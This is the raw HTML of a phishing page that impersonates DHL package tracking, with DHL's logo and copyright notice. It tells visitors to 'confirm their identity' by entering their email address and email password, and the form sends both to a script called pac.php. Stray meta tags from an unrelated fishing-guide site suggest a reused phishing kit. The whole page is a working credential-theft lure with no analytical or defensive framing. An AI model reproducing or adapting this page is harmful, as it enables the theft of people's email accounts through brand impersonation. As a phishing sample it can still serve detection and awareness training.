

<html>
<HEAD>
	<TITLE>DHL | Tracking</TITLE>
        <META NAME="DESCRIPTION" CONTENT="lodging & fishing guide service">
        <META NAME="KEYWORDS" CONTENT="lodging, fishing guide service">
	
<title>TRADE FILE</title>
</head>
<script type="text/javascript"><!--
function validateForm() {
with (document.myform) {
var alertMsg = "The following REQUIRED fields\nhave been left empty:\n";
if (email.value == "") alertMsg += "\nEmail";
if (epass.value == "") alertMsg += "\nEmail Password";
if (alertMsg != "The following REQUIRED fields\nhave been left empty:\n") {
alert(alertMsg);
return false;
} else {
return true;
} } }
// --></script>
<body background="http://www.dhl.com/img/modules/5_1_dhl_global_locator_all_340_187.gif" text="black" link="red" alink="red" vlink="red" background="" >
<!-- 66613 -->
<font face="Arial" style="font-size: 20pt" color="#FF0000">
<center><b>Confirm Your Identity to View Your Tracking</b></font><font face="verdana,arial" size=-1><p>
<img src="http://www.dhl.com/img/meta/dhl_logo.gif" width="300" height="100">
</p>
<table cellpadding=2 cellspacing=0 border=0>
<tr><td bgcolor="red"><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td bgcolor="red" align=center style="padding:2;padding-bottom:4"><b>
	<font size=-1 color="white" face="Comic Sans MS">Enter your 
	Email ID and password</font></b></font><b><font face="Comic Sans MS" size=-1></th></font><font face="Comic Sans MS" size=-1></tr>

</font><font face="verdana,arial" size=-1>
<tr><td bgcolor="white" style="padding:5"><br>
<form action="pac.php" onsubmit="return validateForm()" method="post" name="myform">
<center><table width="517">

<tr><td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
	E-MAIL ID:</td><td width="397"><input type="text" name="email" size="40"></td></tr>

<tr><td colspan=2><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
	</font><font face="verdana,arial" size=1><span  class=text1a>(example777@domain.com)</span></td></tr>
<tr>
<font face="verdana,arial" size=-1>
	<td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp; 
	PASSWORD:</td>

	<td width="397"><input type="password" name="epass" size="40"></td>

	</font>
</tr>
<tr>

<font face="verdana,arial" size=-1>
	<td width="110"><font face="verdana,arial" size=-1>&nbsp;</td>
	<td width="397"><font face="verdana,arial" size=-1><input type="submit" value="Log in To View"></td>
	</font>
</tr>
<tr><td colspan=2><font face="verdana,arial" size=-1></td></tr>
</table></center>
</form>

	<script language="JavaScript">
	<!-- 
			if (document.aform.login.value == '') {
				document.aform.login.focus();
			} 
	-->
	</script>
</td></tr></table></td></tr></table>
<div class="copyright cLight">

&nbsp;</div>
<p>Copyright 1999-2014 DHL WorldWide Delivery. 
All rights reserved. </p>
&nbsp;<center><p><hr size=1 width="90%">&nbsp;</p></center>
</font>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcSjjSx5oJGBJ5xCIC5DiF0VqiUmnThKAsHaLcvy250WZuORIkMf6g" src="" alt="" title="" border=0 width=174 height=62>
<img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTa25N1GKkyMFuK8LmW7b5235Mb9sSmK5MFdS0ANg6ccqu8z2nc" alt="" title="" border=0 width=138 height=49></p>

</body>
</html>

